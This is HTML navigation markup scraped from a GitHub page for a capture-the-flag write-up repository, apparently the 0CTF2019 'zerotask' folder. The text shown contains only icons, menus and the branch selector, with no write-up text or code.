<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> 0n3m4ns4rmy </span> <span>/</span> ctf-write-ups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>1</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>12</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/0n3m4ns4rmy/ctf-write-ups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":142745576,"originating_url":"https://github.com/0n3m4ns4rmy/ctf-write-ups/tree/master/0CTF2019/zerotask","user_id":null}}" data-hydro-click-hmac="92328f352cf5bddf49b46a559ca5a8f369c909ad60c2063f770cc0ef178785f4"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/0n3m4ns4rmy/ctf-write-ups/refs" cache-key="v0:1532854671.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="MG4zbTRuczRybXkvY3RmLXdyaXRlLXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/0n3m4ns4rmy/ctf-write-ups/refs" cache-key="v0:1532854671.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="MG4zbTRuczRybXkvY3RmLXdyaXRlLXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
